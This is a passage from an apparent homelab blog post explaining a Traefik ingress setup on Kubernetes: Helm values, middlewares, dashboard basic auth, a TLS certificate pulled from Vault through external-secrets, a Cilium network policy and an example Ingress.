</span></span><span style="display:flex;"><span>    <span style="color:#f92672">level</span>: <span style="color:#ae81ff">DEBUG</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">format</span>: <span style="color:#ae81ff">json</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">access</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">enabled</span>: <span style="color:#66d9ef">true</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">format</span>: <span style="color:#ae81ff">json</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">metrics</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">prometheus</span>: <span style="color:#66d9ef">null</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">resources</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">requests</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">cpu</span>: <span style="color:#e6db74">&#34;250m&#34;</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">memory</span>: <span style="color:#e6db74">&#34;250M&#34;</span>
</span></span></code></pre></div><p>I&rsquo;m not changing very much about the deployment, save for setting a specific
health port. This is there just because it&rsquo;s the same port I use for my Nomad Traefik.
The <code>homelab/ingress</code> label is there to be used in <code>NetworkPolicy</code> manifests
to allow access for Traefik to services proxied through it.</p>
<p>The <code>ingressendpoint</code> option is an option which ensures that <code>external-dns</code>
later just creates a <code>CNAME</code> entry for each Ingress resource pointing to the
given DNS entry, which will point to the Traefik <code>LoadBalancer</code> Service IP.</p>
<p>I&rsquo;m disabling metrics here because I have not yet set up Prometheus. The
resources assignments are simply coming from the metrics I&rsquo;ve gathered from my
Nomad Traefik deployment over the years.</p>
<p>Next, let&rsquo;s define Traefik&rsquo;s ports. I&rsquo;m staying with the ports for HTTP and HTTPS
here. There are a couple more, like the health port, but I&rsquo;m leaving them out
for the sake of brevity (yes, you are allowed to chuckle dryly now &#x1f609;).</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-yaml" data-lang="yaml"><span style="display:flex;"><span><span style="color:#f92672">ports</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">traefik</span>: <span style="color:#66d9ef">null</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">websecure</span>: <span style="color:#66d9ef">null</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">metrics</span>: <span style="color:#66d9ef">null</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">secureweb</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">port</span>: <span style="color:#ae81ff">8000</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">exposedPort</span>: <span style="color:#ae81ff">443</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">expose</span>: <span style="color:#66d9ef">true</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">protocol</span>: <span style="color:#ae81ff">TCP</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">tls</span>:
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">enabled</span>: <span style="color:#66d9ef">true</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">middlewares</span>:
</span></span><span style="display:flex;"><span>      - <span style="color:#ae81ff">traefik-ingress-compression@kubernetescrd</span>
</span></span><span style="display:flex;"><span>      - <span style="color:#ae81ff">traefik-ingress-headers-security@kubernetescrd</span>
</span></span><span style="display:flex;"><span>      - <span style="color:#ae81ff">traefik-ingress-local-net@kubernetescrd</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">web</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">port</span>: <span style="color:#ae81ff">8081</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">exposedPort</span>: <span style="color:#ae81ff">80</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">expose</span>: <span style="color:#66d9ef">true</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">protocol</span>: <span style="color:#ae81ff">TCP</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">redirectTo</span>:
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">port</span>: <span style="color:#ae81ff">secureweb</span>
</span></span></code></pre></div><p>The <code>traefik</code>, <code>websecure</code> and <code>metrics</code> ports are enabled in the default
<code>values.yaml</code> file of the chart, but I&rsquo;m using my own nomenclature. I will also
show the manifests for the middlewares later.</p>
<p>The port options impact two manifests generated by the chart. First, the
<a href="https://github.com/traefik/traefik-helm-chart/blob/master/traefik/templates/_podtemplate.tpl">pod template</a>,
which defines the entrypoints for all of them via CLI arguments for the Traefik
pod:</p>
<pre tabindex="0"><code>[...]
--entrypoints.secureweb.address=:8000/tcp
--entrypoints.web.address=:8081/tcp
--entrypoints.secureweb.http.middlewares=traefik-ingress-compression@kubernetescrd,traefik-ingress-headers-security@kubernetescrd,traefik-ingress-local-net@kubernetescrd
--entrypoints.secureweb.http.tls=true
--entrypoints.web.http.redirections.entryPoint.to=:443
--entrypoints.web.http.redirections.entryPoint.scheme=https
[...]
</code></pre><p>Those ports are also used in the definition of the Service:</p>
<pre tabindex="0"><code>Port:                     secureweb  443/TCP
TargetPort:               secureweb/TCP
NodePort:                 secureweb  31512/TCP
Endpoints:                10.8.4.116:8000
Port:                     web  80/TCP
TargetPort:               web/TCP
NodePort:                 web  30208/TCP
Endpoints:                10.8.4.116:8081
</code></pre><p>Traefik also provides a nice read-only dashboard to see all the configured
routes, services and so forth. It is supplied with an Ingress via the chart:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-yaml" data-lang="yaml"><span style="display:flex;"><span><span style="color:#f92672">ingressRoute</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">dashboard</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">enabled</span>: <span style="color:#66d9ef">true</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">entryPoints</span>:
</span></span><span style="display:flex;"><span>      - <span style="color:#ae81ff">admin</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">middlewares</span>:
</span></span><span style="display:flex;"><span>      - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">admin-basic-auth</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">namespace</span>: <span style="color:#ae81ff">traefik-ingress</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">healthcheck</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">enabled</span>: <span style="color:#66d9ef">true</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">entryPoints</span>:
</span></span><span style="display:flex;"><span>      - <span style="color:#ae81ff">health</span>
</span></span></code></pre></div><p>As you can see, this is not a default Kubernetes Ingress, but instead Traefik&rsquo;s
own Ingress definition, the <a href="https://doc.traefik.io/traefik/routing/providers/kubernetes-crd/">IngressRoute</a>.
Normal Kubernetes Ingress manifests <a href="https://doc.traefik.io/traefik/routing/providers/kubernetes-ingress/">also work fine</a>,
but Traefik options then need to be supplied via annotations.</p>
<p>Next comes the Service definition:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-yaml" data-lang="yaml"><span style="display:flex;"><span><span style="color:#f92672">service</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">enabled</span>: <span style="color:#66d9ef">true</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">single</span>: <span style="color:#66d9ef">true</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">type</span>: <span style="color:#ae81ff">LoadBalancer</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">annotations</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">external-dns.alpha.kubernetes.io/hostname</span>: <span style="color:#ae81ff">ingress-k8s.mei-home.net</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">io.cilium/lb-ipam-ips</span>: <span style="color:#e6db74">&#34;10.86.55.22&#34;</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">labels</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">homelab/public-service</span>: <span style="color:#e6db74">&#34;true&#34;</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">spec</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">externalTrafficPolicy</span>: <span style="color:#ae81ff">Local</span>
</span></span></code></pre></div><p>With the <code>single</code> option, you can configure whether Traefik creates a single
Service for both TCP and UDP or a separate Service for each.
The <code>external-dns.alpha.kubernetes.io/hostname</code> annotation sets the DNS name
automatically configured by external-dns. I&rsquo;m also setting a fixed IP instead
of letting Cilium assign one from the pool, so I can properly configure firewall
rules.
The <code>homelab/public-service</code> label is significant, because it denotes the services
which Cilium announces. See <a href="https://blog.mei-home.net/posts/k8s-migration-2a-cilium-bgp/">my post</a>
on using the Cilium BGP load balancer.
As noted above, <code>externalTrafficPolicy: Local</code> gives me source IP preservation.</p>
<p>The last base configuration options are for TLS, but I will go into more details
about how I manage the TLS cert later on.</p>
<h1 id="middlewares">Middlewares</h1>
<p>In Traefik, Middlewares are part of the request handling pipeline. A request
enters Traefik via any of the <a href="https://doc.traefik.io/traefik/routing/entrypoints/">EntryPoints</a>.
Then, all Middlewares are applied. These range from IP allow listing to URL
rewriting. They can be assigned to EntryPoints, which means they are getting
applied to every request, or to specific routes via Ingress or IngressRoute
configs.</p>
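<p>For completeness: to attach a Middleware to only a single route via a plain Ingress,
Traefik expects an annotation in the form <code>&lt;namespace&gt;-&lt;name&gt;@kubernetescrd</code>,
roughly like this, using the <code>local-net</code> middleware defined below:</p>
<pre tabindex="0"><code>metadata:
  annotations:
    traefik.ingress.kubernetes.io/router.middlewares: traefik-ingress-local-net@kubernetescrd
</code></pre>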
<p>I&rsquo;m using a couple of them, which I supply via the Helm chart&rsquo;s <code>extraObjects</code>
value:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-yaml" data-lang="yaml"><span style="display:flex;"><span><span style="color:#f92672">extraObjects</span>:
</span></span><span style="display:flex;"><span>  - <span style="color:#f92672">apiVersion</span>: <span style="color:#ae81ff">traefik.io/v1alpha1</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">kind</span>: <span style="color:#ae81ff">Middleware</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">metadata</span>:
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">name</span>: <span style="color:#ae81ff">compression</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">labels</span>:
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">homelab/part-of</span>: <span style="color:#ae81ff">traefik-ingress</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">spec</span>:
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">compress</span>: {}
</span></span><span style="display:flex;"><span>  - <span style="color:#f92672">apiVersion</span>: <span style="color:#ae81ff">traefik.io/v1alpha1</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">kind</span>: <span style="color:#ae81ff">Middleware</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">metadata</span>:
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">name</span>: <span style="color:#ae81ff">headers-security</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">labels</span>:
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">homelab/part-of</span>: <span style="color:#ae81ff">traefik-ingress</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">spec</span>:
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">headers</span>:
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">stsSeconds</span>: <span style="color:#ae81ff">63072000</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">stsIncludeSubdomains</span>: <span style="color:#66d9ef">true</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">customFrameOptionsValue</span>: <span style="color:#e6db74">&#34;sameorigin&#34;</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">contentTypeNosniff</span>: <span style="color:#66d9ef">true</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">referrerPolicy</span>: <span style="color:#e6db74">&#34;same-origin&#34;</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">browserXssFilter</span>: <span style="color:#66d9ef">true</span>
</span></span><span style="display:flex;"><span>  - <span style="color:#f92672">apiVersion</span>: <span style="color:#ae81ff">traefik.io/v1alpha1</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">kind</span>: <span style="color:#ae81ff">Middleware</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">metadata</span>:
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">name</span>: <span style="color:#ae81ff">local-net</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">labels</span>:
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">homelab/part-of</span>: <span style="color:#ae81ff">traefik-ingress</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">spec</span>:
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">ipWhiteList</span>:
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">sourceRange</span>:
</span></span><span style="display:flex;"><span>          - <span style="color:#e6db74">&#34;10.1.1.0/24&#34;</span>
</span></span><span style="display:flex;"><span>          - <span style="color:#e6db74">&#34;192.168.1.0/24&#34;</span>
</span></span></code></pre></div><p>The first one, <code>compression</code>, just enables the <a href="https://doc.traefik.io/traefik/middlewares/http/compress/">compression</a> middleware.</p>
<p><code>headers-security</code> adds a couple of best practices headers to all requests
for security&rsquo;s sake. The last one, <code>local-net</code>, is an IP allow list for some of my Homelab
subnets.</p>
<h1 id="securing-the-dashboard">Securing the dashboard</h1>
<p>Let&rsquo;s look at the IngressRoute for the dashboard a second time, specifically
its <code>middlewares</code> option:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-yaml" data-lang="yaml"><span style="display:flex;"><span><span style="color:#f92672">middlewares</span>:
</span></span><span style="display:flex;"><span>  - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">admin-basic-auth</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">namespace</span>: <span style="color:#ae81ff">traefik-ingress</span>
</span></span></code></pre></div><p>This option enables the following middleware:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-yaml" data-lang="yaml"><span style="display:flex;"><span>- <span style="color:#f92672">apiVersion</span>: <span style="color:#ae81ff">traefik.io/v1alpha1</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">kind</span>: <span style="color:#ae81ff">Middleware</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">metadata</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">name</span>: <span style="color:#ae81ff">admin-basic-auth</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">labels</span>:
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">homelab/part-of</span>: <span style="color:#ae81ff">traefik-ingress</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">spec</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">basicAuth</span>:
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">secret</span>: <span style="color:#ae81ff">basic-auth-users</span>
</span></span></code></pre></div><p>This is a <a href="https://doc.traefik.io/traefik/middlewares/http/basicauth/">BasicAuth</a>
middleware, adding HTTP basic auth to my dashboard, just as another layer of
security.</p>
<p>This middleware expects the secret <code>basic-auth-users</code> to contain a key
<code>users</code>, where the users are listed in the following format:</p>
<pre tabindex="0"><code class="language-none" data-lang="none">username:hashedpassword
myuser:$apr1$wpjd1k59$B5E9r2e8DUgmGWubIb/Bk/
</code></pre><p>The entries can for example be created with <a href="https://httpd.apache.org/docs/2.4/misc/password_encryptions.html">htpasswd</a>.</p>
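<p>Something along these lines should do the trick. The <code>-n</code> flag prints the
entry to stdout instead of writing a file, and <code>-B</code> selects bcrypt, which
Traefik accepts as well:</p>
<pre tabindex="0"><code># prompts for the password, then prints the username:hash line
htpasswd -nB myuser
</code></pre>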
<p>In my setup, I&rsquo;m handling secrets via my <a href="https://www.vaultproject.io/">Vault instance</a>
with <a href="https://external-secrets.io/latest/">external-secrets</a>. I&rsquo;ve described
the setup <a href="https://blog.mei-home.net/posts/k8s-migration-1-external-secrets/">here</a>.
The secret definition for the basic auth secret looks like this:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-yaml" data-lang="yaml"><span style="display:flex;"><span><span style="color:#f92672">apiVersion</span>: <span style="color:#ae81ff">external-secrets.io/v1beta1</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">kind</span>: <span style="color:#ae81ff">ExternalSecret</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">metadata</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">name</span>: <span style="color:#e6db74">&#34;basic-auth-users&#34;</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">labels</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">homelab/part-of</span>: <span style="color:#ae81ff">traefik-ingress</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">spec</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">secretStoreRef</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">name</span>: <span style="color:#ae81ff">my-vault-store</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">kind</span>: <span style="color:#ae81ff">ClusterSecretStore</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">refreshInterval</span>: <span style="color:#e6db74">&#34;15m&#34;</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">target</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">creationPolicy</span>: <span style="color:#e6db74">&#39;Owner&#39;</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">template</span>:
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">metadata</span>:
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">labels</span>:
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">homelab/part-of</span>: <span style="color:#ae81ff">traefik-ingress</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">data</span>:
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">users</span>: |<span style="color:#e6db74">
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">          {{ printf &#34;{{ `{{ .user1 }}` }}&#34; }}</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">data</span>:
</span></span><span style="display:flex;"><span>    - <span style="color:#f92672">secretKey</span>: <span style="color:#ae81ff">user1</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">remoteRef</span>:
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">key</span>: <span style="color:#e6db74">&#34;secret/my_kubernetes_secrets/cluster/ingress/auth/user1&#34;</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">property</span>: <span style="color:#ae81ff">val</span>
</span></span></code></pre></div><p>What happens here is that external-secrets takes the JSON object returned by
Vault for the <code>secret/my_kubernetes_secrets/cluster/ingress/auth/user1</code> path,
and then takes the <code>val</code> key in that object, putting it into <code>user1</code>. That&rsquo;s
then accessed in the template for the Kubernetes Secret.</p>
<p>The weird <code>{{ printf &quot;{{ '{{ .user1 }}' }}&quot; }}</code> syntax comes from the fact
that I&rsquo;m using Helmfile for my Helm charts management, and that puts value
files through a round of Go templating. That&rsquo;s what the outer <code>printf</code> is used
to escape. Then that value file goes through Helm&rsquo;s templating. That&rsquo;s escaped
by <code>{{  }}</code> and the backticks. And then <code>{{ .user1 }}</code> is the template that&rsquo;s
used by external-secrets.</p>
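<p>To make that onion of templating a bit more tangible, this is roughly what the
string looks like after each pass:</p>
<pre tabindex="0"><code># What I write in the Helmfile values file:
{{ printf &#34;{{ `{{ .user1 }}` }}&#34; }}

# After the Helmfile (Go templating) pass:
{{ `{{ .user1 }}` }}

# After the Helm templating pass, i.e. what ends up in the ExternalSecret:
{{ .user1 }}
</code></pre>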
<h1 id="the-tls-certificate">The TLS certificate</h1>
<p>My TLS certificate is a wildcard certificate from Let&rsquo;s Encrypt. Sadly, my
domain registrar does not support an API for the DNS entries, so for now I have
to solve the DNS challenge manually.
I&rsquo;m using the LE cert for both internal and external services, mostly so that
I don&rsquo;t have to muck around with distributing a self-signed CA cert to all my
end-user devices.
After I&rsquo;ve renewed the cert, I push it to Vault and use it from there.</p>
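<p>Pushing the renewed cert to Vault is a single CLI call. A rough sketch of what that
can look like with the path used below; the file names are placeholders, and only the
<code>privkey</code> and <code>fullchain</code> keys are actually used by the <code>ExternalSecret</code>:</p>
<pre tabindex="0"><code>vault kv put secret/my_kubernetes_cluster/cluster/ingress/le-cert \
    privkey=@privkey.pem \
    cert=@cert.pem \
    chain=@chain.pem \
    fullchain=@fullchain.pem
</code></pre>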
<p>The <code>ExternalSecret</code> for getting the certs into Kubernetes looks like this:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-yaml" data-lang="yaml"><span style="display:flex;"><span><span style="color:#f92672">apiVersion</span>: <span style="color:#ae81ff">external-secrets.io/v1beta1</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">kind</span>: <span style="color:#ae81ff">ExternalSecret</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">metadata</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">name</span>: <span style="color:#e6db74">&#34;le-cert&#34;</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">labels</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">homelab/part-of</span>: <span style="color:#ae81ff">traefik-ingress</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">spec</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">secretStoreRef</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">name</span>: <span style="color:#ae81ff">my-vault-store</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">kind</span>: <span style="color:#ae81ff">ClusterSecretStore</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">refreshInterval</span>: <span style="color:#e6db74">&#34;15m&#34;</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">target</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">creationPolicy</span>: <span style="color:#e6db74">&#39;Owner&#39;</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">template</span>:
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">type</span>: <span style="color:#ae81ff">kubernetes.io/tls</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">metadata</span>:
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">labels</span>:
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">homelab/part-of</span>: <span style="color:#ae81ff">traefik-ingress</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">data</span>:
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">tls.key</span>: |<span style="color:#e6db74">
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">          {{ printf &#34;{{ `{{ .privkey }}` }}&#34; }}</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">tls.crt</span>: |<span style="color:#e6db74">
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">          {{ printf &#34;{{ `{{ .fullchain }}` }}&#34; }}</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">dataFrom</span>:
</span></span><span style="display:flex;"><span>    - <span style="color:#f92672">extract</span>:
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">key</span>: <span style="color:#ae81ff">secret/my_kubernetes_cluster/cluster/ingress/le-cert</span>
</span></span></code></pre></div><p>The two-level escape of the <code>{{ .privkey }}</code> and <code>{{ .fullchain }}</code> templates
is again to make sure neither Helmfile nor Helm itself try to interpret the
templates.</p>
<p>Here, I&rsquo;m using a slightly different format for fetching the secret. With
<code>dataFrom</code> instead of <code>data</code>, as in the basic auth secret, I&rsquo;m getting the entire
JSON object from that path, instead of a specific key from that object.
When I push my cert to Vault, I have four keys, with the private key, the cert
itself, the cert chain and the full chain. Here, I only need the private key
and the full chain.</p>
<p>This secret is then used in Traefik&rsquo;s <a href="https://doc.traefik.io/traefik/https/tls/#certificates-stores">TLSStore</a>:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-yaml" data-lang="yaml"><span style="display:flex;"><span><span style="color:#f92672">tlsStore</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">default</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">defaultCertificate</span>:
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">secretName</span>: <span style="color:#ae81ff">le-cert</span>
</span></span></code></pre></div><h1 id="network-policies">Network policies</h1>
<p>Before coming to an example, I also want to show the <code>NetworkPolicy</code> I&rsquo;m using:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-yaml" data-lang="yaml"><span style="display:flex;"><span><span style="color:#f92672">apiVersion</span>: <span style="color:#e6db74">&#34;cilium.io/v2&#34;</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">kind</span>: <span style="color:#ae81ff">CiliumNetworkPolicy</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">metadata</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">name</span>: <span style="color:#e6db74">&#34;traefik-allow-world-only&#34;</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">spec</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">endpointSelector</span>: {}
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">ingress</span>:
</span></span><span style="display:flex;"><span>    - <span style="color:#f92672">fromEndpoints</span>:
</span></span><span style="display:flex;"><span>      - {}
</span></span><span style="display:flex;"><span>    - <span style="color:#f92672">fromEntities</span>:
</span></span><span style="display:flex;"><span>      - <span style="color:#ae81ff">world</span>
</span></span></code></pre></div><p>With the <code>{}</code> <code>endpointSelector</code>, the policy is applied to all pods in the
namespace the policy resides in. In this particular case, that&rsquo;s only the Traefik
pod.
The <code>fromEndpoints:</code> setting in turn says that ingress should be allowed from
all pods within the same namespace. Finally, the only really interesting setting
here is the <code>fromEntities: [world]</code>. This setting allows all external traffic
from nodes which are not managed by Cilium, meaning the rest of my Homelab and
especially my end-user devices.</p>
<h1 id="example-ingress">Example Ingress</h1>
<p>Last but not least, let&rsquo;s have a look at a quick example. In my
<a href="https://blog.mei-home.net/posts/k8s-migration-2-cilium-lb/#example">post about load balancers</a>,
I introduced a simple echo server and made it available via a <code>LoadBalancer</code> type
Service. With Traefik up and running, I can now switch that service to <code>ClusterIP</code>
and introduce the following <code>Ingress</code> manifest:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-yaml" data-lang="yaml"><span style="display:flex;"><span><span style="color:#f92672">apiVersion</span>: <span style="color:#ae81ff">networking.k8s.io/v1</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">kind</span>: <span style="color:#ae81ff">Ingress</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">metadata</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">name</span>: <span style="color:#ae81ff">testsetup-ingress</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">namespace</span>: <span style="color:#ae81ff">testsetup</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">annotations</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">traefik.ingress.kubernetes.io/router.entrypoints</span>: <span style="color:#ae81ff">secureweb</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">labels</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">homelab/part-of</span>: <span style="color:#ae81ff">testsetup</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">spec</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">rules</span>:
</span></span><span style="display:flex;"><span>    - <span style="color:#f92672">host</span>: <span style="color:#ae81ff">testsetup.mei-home.net</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">http</span>:
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">paths</span>:
</span></span><span style="display:flex;"><span>          - <span style="color:#f92672">path</span>: <span style="color:#ae81ff">/</span>
</span></span><span style="display:flex;"><span>            <span style="color:#f92672">pathType</span>: <span style="color:#ae81ff">Prefix</span>
</span></span><span style="display:flex;"><span>            <span style="color:#f92672">backend</span>:
</span></span><span style="display:flex;"><span>              <span style="color:#f92672">service</span>:
</span></span><span style="display:flex;"><span>                <span style="color:#f92672">name</span>: <span style="color:#ae81ff">testsetup-service</span>
</span></span><span style="display:flex;"><span>                <span style="color:#f92672">port</span>:
</span></span><span style="display:flex;"><span>                  <span style="color:#f92672">name</span>: <span style="color:#ae81ff">http-port</span>
</span></span></code></pre></div><p>The only Traefik specific config here is the <code>entrypoints</code> annotation, telling
